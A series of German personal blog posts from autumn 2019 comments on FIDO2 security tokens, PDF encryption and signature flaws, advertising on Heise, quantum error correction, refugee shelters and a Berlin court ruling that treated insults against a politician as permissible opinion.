[l] Coole Forschung des Monats: Fluktuationen im Silberpreis als Prediktor für Terroranschläge. Wait, what?! Stellt sich raus: Der Koran schreibt vor, dass Reiche 2,5% ihres Reichtums als Almosen an die Bedürftigen geben. Die Pakistanische Regierung hat dafür eine Steuer gemacht. Die Grenze, ab der man als reich gilt, ist aus historischen Gründen der Gegenwert von 612 Gramm Silber. Wenn jetzt also der Silberpreis hochgeht, dann fallen mehr Leute nicht unter diese Steuer, weil sie nicht mehr als reich gelten. Die haben dann plötzlich mehr Geld übrig und spenden das dann halt nicht über die Steuer sondern manuell, und das geht dann häufig an wohltätige Vereinigungen, die Terrorismus finanzieren (Koranschulen oder so).
Wie testet man so eine Theorie? Nun, erstmal fallen nur Sunniten unter diese Steuer, und zweitens fällt die nur im Ramadan an. Wenn man sich jetzt also die Terror-Kurven im Ramadan anguckt, und Schiiten und Sunniten vergleicht, dann müsste man einen signifikanten Unterschied sehen.
Spoiler: Den sieht man auch. (via)

Tue Oct 8 2019

[l] Ich ärgere mich ja seit geraumer Zeit darüber, wie man beim Heise-Newsticker den Content nicht mehr findet, weil er in einem Tsunami aus Werbung untergeht. Gut, bei einem Tech-Newsticker ist die Grenze zur Werbung immer schwierig zu ziehen, man berichtet ja über Ankündigungen von Produkten. Aber inzwischen gibt es gefühlt ein Dutzend neue Wege, wie sie ihre Leser mit Werbung bombardieren. "heise-Angebot" ist Werbung. "Technology Review" ist Werbung. "Mac & i" ist Werbung. "Brandworld" ist reine Werbung. "techstage" ist im Wesentlichen eine Liste von Affiliate-Links, das finde ich noch schlimmer als Werbung. Unter den Artikeln ist dann Outbrain und Fake-Umfragen, die unterste Schublade von Werbung, die man überhaupt haben kann.
Ich habe ja ganz am Anfang meiner Karriere Paperboy programmiert, sowas wie Google News vor Google News. Wir hatten ein Werbebanner vom "Quality Channel", das war das Werbenetzwerk von Spiegel Online. Wir hatten ein Banner. Eines. Oben drüber. Und da floss genug Geld drüber, dass man davon gut hätte leben können. Und was haben die Zeitungen gemacht? Ach komm, wir machen hier noch ein Banner unten drunter, und eines in die Mitte, und dann hier noch eines an den Rand, und dann kamen Interstitionals, Popups, es wird einfach immer nur schlimmer und schlimmer. Und was bewirkt das? Der Wert des einzelnen Banners sinkt. Wenn ich bei Heise eine Werbung schalte, und unten drunter ist Outbrain und macht Werbung für unseriöse Cryptocurrency-"Investments", "Silber-Gedenkmünzen" und sogar "laden Sie hier Ihr Treiberpaket runter" (so fängt man sich tolle Trojaner ein!), dann ist das wie mit Immobilien. Dieser unseriöse Ranzkack in der Nachbarschaft senkt den Preis meiner Immobilie. Durch die Menge und die Unseriosität der reingenommenen Werbung haben sich die Verlage selbst ihre Preise zerstört.
Ich meckere jetzt über Heise, weil ich Axel Springer nicht lese. Im Moment glaube ich nicht, dass Heise losziehen und Adblocker verbieten würde. Aber wer weiß, ich hätte auch nicht gedacht, dass Heise "Brandworld" und Outbrain macht.
Ich glaube, die Lösung für das Finanzierungsproblem ist ganz einfach. Habt nur einen Banner pro Seite. Oben drüber. Mittig. That's it. Der ist dann auch wieder etwas wert. Wobei durch die massenhafte Verbreitung von Adblockern, die ihr Verlage ja selbst herbeigeführt habt, auch der Zug schlicht abgefahren sein könnte.
[l] Schöne Grüße von Madame Streisand an Finfisher und ihre Anwälte!
Ich weiß nicht, wie es euch geht, aber ich hatte den ursprünglichen Artikel gar nicht mitgekriegt. Ich habe aber auch aufgehört, Artikel über Gamma Group und Finfisher zu lesen, was die jetzt schon wieder schlimmes gemacht haben, muss ich ehrlich sagen. Die sind in meiner Bewertung schon auf dem untersten Punkt angekommen. Ich brauchte gar keinen weiteren Input, wie schlimm die sind.

Mon Oct 7 2019

[l] Die aktuelle Anstalt vom 1. Oktober lohnt sich mal wieder. Geht darum, wie die CDU den Ökostrom kaputtgemacht hat.

Sun Oct 6 2019

[l] Die Demonstranten in Hong Kong haben gerade die Revolution ausgerufen. Und zitieren in ihrem verlesenen Manifest freizügig aus der Gettysburg Address und der US-Unabhängigkeitserklärung. Ob das ein schlauer Schachzug ist? Auf der einen Seite ist die Idee natürlich, dass die Amerikaner einschreiten, wie sie es in Taiwan gemacht haben. Auf der anderen Seite ist in Mainland China schon länger die Propaganda so, dass das eine von außen gesteuerte Geschichte ist. Das bestätigt man damit ja. Na wir werden sehen.

Fri Oct 4 2019

[l] Ui das ging schnell, hier ist schon der erste Leserbrief zu FIDO2:
Ist zwar richtig, dass Krypto selten angegriffen wird, aber gerade bei TPMs und Smartcards hatten wir echt ernsthafte Fälle von ranziger Krypto:
https://www.heise.de/security/meldung/Hunderttausende-Infineon-Sicherheits-Chips-weisen-RSA-Schwachstelle-auf-3864691.html
Das ist nur ein Beispiel des Fehlers, da waren nicht nur TPMs, sondern auch SmartCards, Yubikeys und ähnliches betroffen. Gerade weil diese Chips so klein sind, und da irgendwie nur ein kleines Team von Leuten ohne besonders große Expertise dran rumbastelt, und es da keine sauber geauditete freie Software gibt, die das erledigt, ist das alles noch mal um ein paar Größenordnungen ranziger als sonst.
FIDO2 hat wohl auch deshalb auch auf RSA verzichtet, aber eine elliptische Kurve gewählt, die bei DJB definitiv als nicht trivial sicher implementierbar aufgelistet ist. Warum macht man sowas? Die NIST-Kurven mit ihrer NSA-Vergangenheit sind eh nicht besonders zu empfehlen. Nicht nur deshalb, sondern, weil da viele Details unnötig komplex sind.
Als jemand, der in der Donna-Implementierung von ed25519 erst mal zwei Löcher beseitigen musste (1. kein Constant-Time Diffie-Hellman-Exchange — das war in der Referenz-Anwendung nicht verlangt, aber ist ein sinnvolles Primitive, 2. Secret Keys werden auf dem Stack zurückgelassen und nicht gelöscht — das ist ein Standard-Faux-Pas, den man fast überall findet) kann ich nur sagen, dass Krypto halt doch schwer ist.
Mein Pet Peeve an FIDO2 ist, dass sie sich gar keine Gedanken über Recovery gemacht haben. Wenn das Token weg ist, ist der Zugang weg. Ich denke, die haben sich deshalb keine Gedanken gemacht, weil es ja diese herrliche Passwort-Zurücksetzen-Funktion über E-Mail gibt. Solange es das gibt, ist der Verlust des Tokens natürlich beherrschbar.
Aber dafür ist dann der Verlust des E-Mail-Accounts wieder die gleiche Katastrophe wie bisher auch schon. Ne, Leute! Und dass der E-Mail-Account natürlich auch mit dem Token abgesichert sein sollte, das hat sich von den Hirnwichsern keiner gedacht, oder?
Am Grundprinzip Pubkey-Authentication finde ich jetzt übrigens alles richtig.
Das ist ok so.
[l] Ein Leser fragt gerade, ob diese neue FIDO2-Zeug nicht auch Schuldabwälzung ist.
Ja und nein. Auf der einen Seite ist das kein reiner Schlangenöl-Placebo. An der Spec haben sich Experten aus mehreren Fachgebieten die Hände wund-masturbiert. Da ist einmal alles drin. Von Challenge-Response über Public-Key bis hin zu USB und NFC. Die Spec erwähnt als Inspiration auch Smartcards, damit wirklich jeder an Bord ist.
Das hat technisch schon Hand und Fuß, was die da machen. Ich rede trotzdem von Masturbation, weil dem ein paar Annahmen zugrundeliegen, über die man, zurückhaltend formuliert, nochmal diskutieren sollte.
FIDO2 kombiniert zwei Trends, die wir gerade gehäuft sehen in der IT-Security. Erstens: Unsere Software ist so unfassbar komplex geworden, dass wir Security nicht mehr herbeiführen können, daher bauen wir jetzt einen kleinen Mini-Rechner, und der ist dann so klein, dass man ihm noch vertrauen kann. Das Muster kennt ihr wahrscheinlich aus dem Supermarkt oder von Banken, die euch dann da so ein kleines Mini-Terminal für Kartenzahlung hinhalten. Da ist auch der Gedanke, dass das klein und verplombt ist und man dem daher vertrauen kann, weil die Bank oder der Supermarkt daran gar nicht mehr herumpfriemeln könnte, selbst wenn sie wollten.
Der zweite Trend ist, dass wir von sich gegenseitig vertrauenden Komponenten und der Unterscheidung "Internet vs. Intranet" zusehends wegkommen und stattdessen überall Krypto ausrollen. Selbst innerhalb von Chips haben wir inzwischen Krypto, und innerhalb von Modulen einer Software. Selbst so ein SOC, wie er in Mobiltelefonen verbaut wird, besteht inzwischen aus sich gegenseitig nicht mehr vertrauenden Modulen, die Krypto einsetzen.
Welche Annahmen meine ich jetzt, über die man nochmal reden sollte? Na die erste ist offensichtlich, dass diese Hardware "tamper proof" ist. Einer meiner Lieblingssprüche zu tamper-proof hardware ist von Peter Gutmann, der sagte: It is said that the only tamper-proof hardware is Voyager 2. Und zwar nicht, weil die Hardware sicher ist, sondern weil man da so schlecht rankommt, weil das Ding so weit weg ist. Die Annahme, dass man so einen Stick überhaupt tamper-proof machen kann, würde ich schonmal direkt bestreiten wollen. Klar, billig ist so ein Angriff auf so eine Hardware dann nicht. Aber wer weiß, wie viel wert die Geheimnisse sind, die ihr mit so einem Gerät absichern wolltet?
Die andere, wichtigere Annahme ist, dass es mit 2FA nicht so schlimm ist, wenn der Rechner oder der Browser gehackt wird. Und das stimmt halt auch nur partiell.
Ohne 2FA ist es so, dass ein Eindringling alle eure gespeicherten Passwörter direkt auslesen und ausleiten kann. Das ist im Normalfall ein Totalschaden.
Mit 2FA ist es so, dass die Passwörter nicht reichen, weil man den 2. Faktor braucht. Allerdings kann ein Angreifer im Browser ja einfach warten, bis ich mich das nächste Mal mit 2FA anmelde, und dann mit meiner angemeldeten Session Unfug machen. Das ist von der Auswirkung her fast genau so schlimm.
Dann gibt es da auch wieder eine Convenience-Abwägung. Nimmt man ein Token, was man bloß einstecken muss? Oder eines, wo man zusätzlich einen Knopf drücken muss? Oder eines, wo man den Fingerabdruck geben muss, damit der freischaltet? Die meisten Leute werden fürchte ich ein Token nehmen, das man einfach einsteckt und dann stecken lassen kann, und dann hat man halt nicht viel gewonnen in dem Szenario, dass ein Hacker den Browser übernimmt.
Und so ist es wie so häufig in der Security. Ist eigentlich keine doofe Idee, aber bringt eben auch nicht so viel, wie einem das Marketing aufzuschwatzen versuchen wird.
Ich persönlich verkünde ja seit ein paar Jahren, dass Komplexität der Feind ist. Unter der Metrik sieht so ein Token recht komplex aus. Zwischen PC und dem Token gibt es ein Binärprotokoll, über das man möglicherweise die Software auf dem Token angreifen kann. Weiß ich nicht, ob das eine reelle Bedrohung ist, aber die Angriffsoberfläche gibt es jedenfalls schonmal, und vorher gab es die nicht. Mir persönlich stößt es sauer auf, dass die erstmal NOCH ein neues Binär-Serialisierungs-Verfahren "erfunden" haben dafür. Dabei kommt dieser Scheiß von Google, und die haben uns vorher schon völlig ohne Not ihre Protocol Buffers reingedrückt. Der Typ von Protocol Buffers ist inzwischen nicht mehr bei Google. Was hat er als erstes getan? Ihr werdet es geraten haben: Ein neues Binär-Serialisierungs-Verfahren gemacht ("Cap'n Proto").
Das sind die Leute, die uns vorher gesagt haben, ASN.1 sei gefährlich und wir sollen unsere Krypto lieber als JSON in Base64 machen (googelt man JWT, wenn euch das neu ist).
Also, zusammengefasst. Ist das Schuldabwälzung? Ja. Ganz klar. Wenn euer Account jetzt gehackt wird, dann habt ihr euer Token verbummelt und es ist eure Schuld.
Ist es nur Schuldabwälzung? Ich glaube nicht. Aber ob euch das tatsächlich was nützt, hängt davon ab, ob es wahrscheinlicher ist, dass ihr (im Vorher-Szenario) den Laptop verliert, oder (im Nachher-Szenario) das Token. Dass die Krypto von den Tokens ranzig ist, da müsst ihr euch glaube ich wenig Sorgen machen. Es kommt so gut wie nie vor, dass Krypto-Krams über die Krypto angegriffen wird. Ich würde mir eher Sorgen machen, dass mir ein Taschendieb das Token klaut, und weil das nichts wiegt, merke ich es nicht sofort. Und dann ist da am besten auf dem Fingerabdrucksensor noch ein rekonstruierbarer Fingerabdruck von mir drauf.
Im Übrigen: Wenn ihr euch für FIDO2 entscheidet, dann gilt natürlich dasselbe wie auch für andere Security-Produkte. Kann ich dem Hersteller trauen? Ist das Open Source? Kann ich das zur Not selbst patchen, wenn der Hersteller stirbt oder sich weigert? Wie sind die Recovery-Pfade, falls das Token verlorengeht? Fange ich mir damit eine Beweislastumkehr ein?
Update: Dies ist vielleicht die richtige Gelegenheit für den Hinweis, dass es auch außerhalb von 2FA Wege gibt, die Arbeitsumgebung sicherer zu machen. Es hat sich z.B. eingebürgert, sich bei Webseiten einzuloggen, und dann einfach eingeloggt zu bleiben. Während ihr bei einer Site eingeloggt seid, kann auch eine andere, böse Webseite auf allen anderen Webseiten, auf denen ihr noch eingeloggt seid, Daten abgreifen und eventuell sogar Transaktionen auslösen. Das ist ein häufiger Bug in Webseiten, gegen den es seit einer Weile ordentliche Browser-Gegenwehr gibt, die über "wir passen halt überall auf" hinausgeht. Aber das ist ein Risiko, das man sich gar nicht erst ans Bein binden muss. Ich jedenfalls halte mich auf Webseiten wenn möglich unangemeldet auf und logge mich nur kurz ein, wenn ich einen Kommentar abgeben will oder so. Und dann ist da noch die Frage, was man mit den Passwörtern macht. Hier gibt es ein weites Spektrum an Ratschlägen. Ein Master-Passwort im Browser vergeben hilft, falls einem der ausgeschaltete Rechner wegkommt. Hilft nicht, wenn man sich einen Trojaner einfängt oder einen Angreifer im Browser hat oder wenn der Rechner nur im Sleep-Modus war und nicht ganz ausgeschaltet, und da am Besten noch ein Browser offen war. Und für "der ausgeschaltete Laptop wird geklaut" habt ihr hoffentlich eh schon Full Disk Encryption aktiviert.
Meine Einschätzung ist im Moment, dass die Browser die Achillesferse der IT sind, und man immer sofort alle Security-Updates einspielen muss. Ich bin sogar soweit gegangen, meine Browser vom Beta-Channel zu beziehen, damit ich nicht nur einmal im Monat Bugfixes kriege.
Dass man nicht überall dasselbe Passwort nehmen soll, hat sich glaube ich schon herumgesprochen. Ich halte es so, dass ich Passwörter von einer Software zufällig generieren lasse. Dann weiß ich, dass die Passwörter ausreichend Entropie haben. Nachteil: Die Passwörter merkt man sich dann nicht mehr. Dafür gibt es Passwortmanager, oder man verlässt sich auf den Browser. Allerdings: Wer den Browser übernehmen kann, kommt auch an eure Passwörter, solange es da einen Automatismus gibt und ihr die nicht immer manuell rüberkopiert.

Thu Oct 3 2019

[l] Falls ihr am Wochenende ein paar Stunden Zeit habt und gut Englisch verstehen könnt: Eric Weinstein hat einen Interview-Podcast namens "The Portal" gemacht, und seine erste Folge ist mit Peter Thiel. Ich finde die beide ein bisschen anstrengend, aber es lohnt sich immer, sich möglichst ungefiltert den Gedanken von Leuten auszusetzen, die andere Meinungen haben als man selbst, daher habe ich mir das trotzdem angehört.
Weinstein finde ich anstrengend, weil ich immer das Gefühl habe, der muss gerade mit großen Worten und anderer Leute Theorien den Nachweis erbringen, dass er gebildet ist. Dabei hätte der das nicht nötig.
Und Peter Thiel stottert leicht, was ihm zwei Stunden lang zuzuhören anstrengend macht. Es lohnt sich aber m.E. trotzdem.
Gar nicht mal wegen deren Ideen, sondern auch weil man mal in das Hirn von so jemandem gucken kann. Thiel lässt am Rande in einem Nebensatz die Idee raus, dass unsere Wissenschaften ja so selektieren, dass die Leute, die Mathe können, Physiker werden, und die, die nicht Mathe können, die werden Biologen. Wenn ihr also leicht zu beleidigen seid, dann hört euch das lieber nicht an.
Eine weitere Eigenschaft des Podcasts ist, dass sie viele interessante Dinge gar nicht erst ansprechen, weil die aus ihrem Weltbild heraus völlig offensichtlich sind. Die muss man halt selber durch Mitdenken selber herausarbeiten.
Update: Ein Highlight fängt bei 2:40:00 an, als Peter Thiel vom Problem der jungen Generation spricht, dass die ja unter ständiger Beobachtung wären, sowas wie das Auge Saurons. Thiel hat eine Firma namans Palantir gegründet. Das ist auch ein Begriff aus Tolkien, und die Firma stellt Big Data-Produkte für Überwachungs- und Polizeistaaten her.

Tue Oct 1 2019

[l] Der EuGH hat das Cookie-Banner-Debakel nochmal eine Ecke schlimmer gemacht. Deutschlands Sonderregelung ist nicht EU-Rechts-konform hat der EuGH entschieden. Damit hat er natürlich völlig Recht und die Deutschen haben mal wieder nicht nur verkackt, sondern mit Ansage verkackt. Aber die Auswirkung wird sein, dass wir jetzt noch mehr bekackte Cookie-Warnschilder sehen werden. Und die werden dann vermutlich alle einen Cookie setzen, dass wir zugestimmt haben. Ja super.
Ich weiß nicht, wie es euch geht, aber ich verwende inzwischen Adblocker-Tech zum Entfernen von Cookie-Bannern. Nicht zu ertragen.

Mon Sep 30 2019

[l] Benutzt hier jemand PDF-Krypto? Also nicht PDF in einem ZIP mit Passwort oder PDF mit GnuPG sondern die Krypto, bei der der PDF-Reader nach einem Passwort fragt? Stellt sich raus: Die ist ziemlich schrottig spezifiziert und implementiert. Das liegt daran, dass PDF halt kein serielles Dokumentenformat ist, sondern eine Datenstruktur mit internen Verweisen, und die Verschlüsselung bezieht sich daher auch nicht notwendigerweise auf das gesamte Dokument sondern nur auf einen Teil davon. Das kann man durch geschickte Manipulation der Dokumentenstruktur ausnutzen, um eigentlich verschlüsselte Daten z.B. über einen Link oder ein Formular zu exfiltrieren. Noch schlimmer: Verschlüsselung in PDF beinhaltet normalerweise keinen Integritätsschutz, und daher kann man eine Eigenschaft vom CBC Cipher Modus ausnutzen, um den Inhalt zu manipulieren. Das steht eigentlich normalerweise schon im Vorwort von jedem Buch über Krypto, dass man nicht nur verschlüsselt sondern immer auch mindestens einen Hash über die Daten macht.
Bei der Signatur sieht es nicht viel besser aus. Da reicht es, wenn man das Signatur-Objekt im PDF kaputtmacht, und schon kann der Reader die Signatur nicht prüfen — aber viele Reader zeigen das offenbar nicht an. Schlimmer noch: PDF definiert einen Weg, hinter dem Content weiteren Content anzuhängen, bei Office nannte man das früher Fast Save. Adobe hat das gemacht, damit man Kommentare anfügen kann. Den konnten sie auch ausnutzen, und dann gibt es noch einen fummeligen Weg, in der Struktur des Dokumentes Dinge hin- und herzuschieben, damit die signierten Pointer noch auf etwas zeigen, aber das ist dann was anderes als zum Zeitpunkt der Signatur.
Nun fallen nicht alle Reader auf alle dieser Angriffe herein, aber echt viele Reader haben mindestens eines dieser Probleme.
Ich für meinen Teil habe die PDF-Krypto noch nie benutzt. Ich sehe keinen Anlass dafür. Wenn man das braucht, macht man GnuPG drum herum. Da hat man dann keines dieser Probleme.

Sun Sep 29 2019

[l] Erinnert ihr euch an das Steele-Dossier? Wo u.a. drinstand, Trump habe in Moskau Watersports mit Prostituierten in einer Hotelsuite gemacht und sei daher jetzt von Putin erpressbar?
Dazu ist jetzt ein Video aufgetaucht, das wohl ganz überzeugend aussieht, und auch in der fraglichen Suite gedreht wurde, aber die war damals anders dekoriert. Daher liegt die Vermutung nahe, Trump oder einer seiner Minions habe das anfertigen lassen, um das dann publikumswirksam als Fälschung enttarnen zu können.

Sat Sep 28 2019

[l] Neulich ganz es einen klaren Fall von Selbstmord in Estland mit der Danske Bank. Da wird sich vielleicht der eine oder andere gefragt haben: Ein Bankenskandal, in dem nicht die Deutsche Bank verwickelt ist?!
Keine Sorge. Die Staatsanwaltschaft hält das auch für unwahrscheinlich und hat erstmal eine Hausdurchsuchung gemacht.

Fri Sep 27 2019

[l] Eine der Sachen, für die ich mein Blog liebe, ist dass ich hier Dinge behaupten kann, die meinem Wissensstand entsprechen, und dann kommen Leute zu mir und erklären mir, wie das wirklich ist. An dieser Stelle möchte ich mal allen Nerds und Wissenschaftlern danken, die mich unermüdlich korrigieren. Ich werde mich weiterhin bemühen, Erkenntnisse weiterzureichen, damit alle was davon haben.
Hier kommt jetzt ein Leserbrief zu Quantenfehlerkorrektur:
Ich arbeite an der Fehlerkorrektur in Quantencomputern. [...] Ich finde das in deinem Vortrag nichts grob falsch war. Das Problem mit der Dekohärenz war Leuten allerdings schon Mitte der 90ger klar. Shors Faktorisierungsalgorithmus wurde nach seiner Publikation genau deswegen kritisiert und Vergleiche zu analogen Computern gezogen.
Das ist aber nicht ganz korrekt. Es gibt einen subtilen Unterschied darin wie sich die Fehler in QC von denen in analogen Computern unterscheiden.
Messungen ermöglichen es das Fehler in Quantencompuern diskretisiert werden. Diese "diskretisierten Fehler" lassen sich dann ähnlich wie in klassischen Speichermedien behandeln. Es ist richtig, dass dies noch nicht in einem Experiment demonstriert wurde, aber es wurden in den letzten Jahren große Fortschritte gemacht (ich kann gerne in mehr Details gehen).
Was ich nicht ganz fair fand war der Kommentar mit dem "Vodoo drauf werfen". Es ist nicht so als ob Leute nicht verstehen was sie tun. Bezüglich des Hypes: Es ist den Wissenschaftlern in dem Feld selbst nicht ganz geheuer. Natürlich ist es wichtig das Menschen sich für die Forschung interessieren, aber es besteht die Gefahr das der Hype in Sarkasmus umschlägt. Das habe ich zum Beispiel bei dem Quantum Supremacy Experiment beobachtet. Das Experiment ist eine großartige Leistung, aber es ist nicht einfach zu Vermitteln warum genau. Interessante Physik findet unter extremen Bedingungen statt, zum Beispiel bei hohen Energien (LHC/CERN). Was erreicht wurde ist einen großen verschränkten Quantenzustand herzustellen und zu manipulieren. Das haben Menschen nie zuvor geschafft. Was aber am Ende bei Leuten ankommt ist das es nichts weiter war als ein nutzloser Quantencomputer.
Ich war diese Woche auf einer Konferenz wo unter andem genau darüber gesprochen wurde wie man Menschen begeistert ohne unnötigen Hype zu erzeugen. Aber keiner hatte eine konkrete Antwort darauf und Leute fürchten sich vor einem "Quantum winter" wie in der KI. Interessanterweise ist das Quantum Supremacy Experiment selbst nur geleaked und nicht offiziell veröffentlcht worden. Ein Sprecher auf der Konferenz glaubt das könnte damit zu tun haben das Google selbst noch damit kämpft wie sie am besten die PR machen.
Vielen Dank für die Erläuterungen! Zu meiner Verteidigung möchte ich vorbringen, dass das mit dem Voodoo nicht negativ gemeint war. Wir Hacker gehen schließlich selber genau so vor, und schießen mit riesigen Kanonen wie Python auf vergleichsweise triviale Probleme.
Wer sich übrigens für Quantencomputer und die Probleme interessiert, für den ist möglicherweise noch das No-Cloning-Theorem interessant. Das war auch eine Sache, die erstmal wie ein Todesstoß für die Idee eines Quantencomputers aussah.

Sun Sep 22 2019

[l] Und noch ein Leserbrief zu Flüchtlingsunterkünften:
nur am Rande wegen der Flüchtlingsheime.
Meine Mutter betreut auch eines und es ist in der tiefsten Pampa. (Vielleicht ist das ein Grund, oder dass sich jemand mit Engagement und Herzblut um die Betreuung kümmert...)
Wie auch ummer - es läuft richtig gut.
Keine Gewalt, keine Übergriffe oder sonstiges.
Ja, die Leute dort scheren sich nicht um den deutschen Ordnungssinn und die Zimmer müssen immer wieder renoviert werden.
Falls es dicke kommt und Konsequenzen folgen müssen, daaaan wird das WLAN ausgemacht.
Das zieht immer - egal was war (meistens Dreck/nicht geputzt) 2 Stunden später ist das vorbildlich erledigt :-)
[l] Noch ein Leserbrief zu Flüchtlingsunterkünften:
ich habe jahrelang ehrenamtliche Betreuung in Flüchtlingswohnheimen gemacht. Keine Security, 2 Teilzeithausmeister, die Sozialarbeiter alles Frauen - da gab es vielleicht deswegen - praktisch nie Ärger. Selbst in der wüsten Situation 2015, wo alle überfordert waren und 6-8 Leute in einem kleinen Zimmer hausten - Familien, kleine Kinder, Halbwüchsige beiderlei Geschlechts - keine nenenswerten Vorfälle. Den einzigen Polizeieinsatz, den ich mitgekriegt habe, war ein völlig verwirrter Flüchtling, der die Polizei angerufen hatte und unbedingt verhaftet werden wollte...Irgendwelche idiotischen Polizeieinsätze gab es aber auch nicht.
Selbst die armen Schweine (hauptsächlich Afrikaner), die schon jahrelang in dem Haus verschimmelten, waren krank und depressiv, aber nicht aggressiv.
Langer Rede, kurzer Sinn: wie man in den Wald reinruft, schallt es wieder heraus. Menschen anständig behandeln hilft so gut wie immer.
PS. Die Menschen, mit denen ich zu tun hatte, fanden die deutsche Polizei super (die hatten schon Vergleiche) - aber ich wohne auch nicht in Bayern...

Fri Sep 20 2019

[l] Leserbrief zum Künast-Urteil:
Nicht nur Du bist von dem Urteil überrascht. Ich unterrichte an der Uni u.a. im Sommersemester ein, zwei Einheiten meiner Lehrveranstaltung zur Meinungsfreiheit. Und ich war überrascht. Bisher war jeder, mit dem ich darüber gesprochen habe, ziemlich überrascht. Dieses Urteil verstehen wohl nur die, die es geschrieben haben (wenn überhaupt).
Aber von vorne:
In den 80ern hatten die Grünen z.T. sehr problematische Einstellungen zum Thema Pädophilie. So hat der Landesverband NRW wohl einen Beschluss gefasst, die Strafbarkeit von sexuellen Handlungen an Kindern aufheben zu wollen "wenn keine Gewalt im Spiel ist". Der damaligen Abgeordneten im Berliner Abgeordnetenhaus wurde das wohl in einer Rede eines CDU-Abgeordneten zum Vorwurf gemacht – natürlich pauschal, ohne die Einschränkung hinsichtlich der vermeintlichen(!) Gewaltfreiheit. Das hat die Berliner Abgeordnete durch den Einwurf "Komma, wenn keine Gewalt im Spiel ist" korrigiert.
Zwischenbemerkung: Das ist eine ziemlich dumme Aussage, da man sie dahingehend verstehen kann, dass man mit Kindern tatsächlich gewaltlosen Sex haben kann. Ich bin der Auffassung, dass die Vornahme sexueller Handlungen an Kindern immer ein Akt der Gewalt ist, wenn nicht physisch, dann auf jeden Fall psychisch. Darum geht es aber im Urteil gar nicht.
Der obige Vorfall ist, wie gesagt, aus den 80ern. Im Jahr 2015 kochte er nochmal hoch, weil die Grünen da ihre zweifelhafte Vergangenheit mit dieser Thematik aufgearbeitet haben. In dem Zusammenhang kommentierte u.a. die Welt in einem Artikel, dieser Einwurf höre sich so an, als sei Sex mit Kindern okay, wenn keine Gewalt im Spiel ist.
Das wiederum hat die Facebook-Seite / der Blog "Halle Leaks" (dem Vernehmen nach wohl von einem Ex-Blood and Honor Nazi betrieben) aufgegriffen und der Politikerin die Aussage "Komma, wenn keine Gewalt im Spiel ist, ist Sex mit Kindern doch ganz okay. Ist mal gut jetzt" in den Mund gelegt.
Darauf hin hat der Mob auf Facebook das gemacht, was der Mob auf Facebook halt so macht. Unter anderem die Politikerin als "Stück Scheisse", "Krank im Kopf", "altes grünes Drecksschwein", "Geisteskrank", "kranke Frau", "Schlampe", "Gehirn Amputiert", "Drecks Fotze", "Sondermüll", "Alte perverse Dreckssau" oder "Paädophilen-Trulla" bezeichnet. Jemand schrieb "Knatter sie doch mal einer so richtig durch, bis sie wieder normal wird!". Eine andere Äußerung war: "Wurde diese 'Dame' vielleicht als Kind ein wenig viel gef… und hat dabei etwas von ihrem Verstand eingebüßt…". Wieder eine andere Äußerung war: "Die will auch nochmal Kind sein weil sonst keiner an die Eule ran geht!".
Das Landgericht Berlin fand das alles "zwar teilweise sehr polemisch und überspitzt und zudem sexistisch", aber letztlich um zulässige Meinungsäußerungen und insbesondere nicht für Beleidigungen.
Wie kommt es dazu?
Nun, zunächst hat die Politikerin Facebook verklagt. Die Politikerin wollte nämlich juristisch gegen die Urheber der Posts vorgehen und von Facebook wollte sie deren Identitäten. Dass sie die bekommen kann, steht in § 14 Abs. 3 Telemediengesetz (TMG). Der nimmt Bezug auf "rechtswidrige Inhalte nach § 1 Abs. 3 Netzwerkdurchsetzungsgesetzes (NetzDG). Hier also: Beleidigung.
Mit anderen Worten: Wenn die fraglichen Äußerungen Beleidigungen darstellen, dann muss Facebook die Bestandsdaten der Urheber herausgeben.
Daher hat sich die 27. Kammer des LG Berlin Gedanken darüber gemacht, ob die Äußerungen Beleidigungen sind.
Interessanterweise hat das LG Berlin Beleidigung gar nicht definiert. Das ist auch schwierig, weil die Beleidigung (§ 185 StGB) der meiner Kenntnis nach einzige Straftatbestand ist, der im Gesetz nicht weiter beschrieben wird. Das Gesetz benennt "Die Beleidigung" als Tatbestand, beschreibt aber nicht weiter, wie die Handlung "jemanden beleidigen" aussieht. Mit "meinen" Studierenden im ersten und zweiten Semester bespreche ich das dann u.a. in Bezug auf das verfassungsmäßige Bestimmtheitsgebot…
Das LG Berlin hat anders angefangen und gesagt, dass zulässige Meinungsäußerungen jedenfalls keine Beleidigungen sind. Das ist grundsätzlich richtig, denn wenn eine Meinungsäußerung eine (strafbare) Beleidigung ist, dann ist sie ja folgerichtig auch nicht mehr zulässig.
Jedenfalls grenzt man hinsichtlich Meinungsfreiheit und Beleidigung (verkürzt) etwa wie folgt ab: Zunächst wird zwischen Tatsachenbehauptungen und Meinungen getrennt. Tatsachenbehauptungen sind grundsätzlich beweisbar (Bsp. "Es regnet." Wir können jetzt einen sachverständigen Metereologen fragen, was Regen ist und dann z.B. die Niederschlagsmenge messen oder feststellen, dass keine Wolke am Himmel ist und kein Niederschlag fällt) während Meinungen von "subjektiven Elementen des wertenden Dafürhaltens" (BVerfG, iirc) geprägt sind und grundsätzlich nicht beweisbar sind (Bsp. "Das Wetter ist schön." Schönes Wetter ist subjektiv und nicht beweisbar; der eine mag Regen, der andere Sonne, der nächste Schnee, und der Vierte braucht Trockenheit aber starken Wind usw. usf.). Wenn es eine Tatsachenbehauptung ist, dann kommt eher die üble Nachrede in Frage. Bei einer Meinung eher die Beleidigung. Bei Vermischung von Tatsachenbehauptung und Meinung ist das Gesamte im Zweifel als Meinung zu betrachten, die ist besser geschützt.
Das Gericht hat alles als Meinung betrachtet. Würde ich sogar noch mitgehen.
Die Grenze zwischen scharfer Kritik und Beleidigung wird (da gibt es einige Urteile vom BVerfG dazu, daher auch hier wieder verkürzt) dort gesehen, wo nicht mehr die Sache (dann zulässig) sondern die Person im Vordergrund steht. Mit anderen Worten: je ad hominem desto Beleidigung. Auch scharfe Werturteile zur Person sind zulässig, da gibt es also einen Graubereich, aber als Fausformel darf gelten, dass wenn die Person im Vordergrund steht und die Sache völlig in den Hintergrund tritt, dann liegt eine Beleidigung vor.
Daneben gibt es noch die sogenannten "Formalbeleidigungen". Das sind Ausdrücke und Wendungen, die immer auf die Diffamierung der Person abzielen; regelmäßig Ausdrücke aus der Fäkalsprache. "Arschloch" ist so ein Standardbeispiel der (heutzutage) eher gemäßigten Tonlage.
Das Gericht ist der Auffassung, dass sämtliche Äußerungen, die Gegenstand der Klage waren, noch ausreichend mit der Sachebene verbunden sind, dass sie nicht die Person der Politikerin, sondern die inhaltliche Frage in den Vordergrund stellen. Udo Vetter titelt im Lawblog passend: "Auf der Suche nach dem Sachkern" (Lawblog).
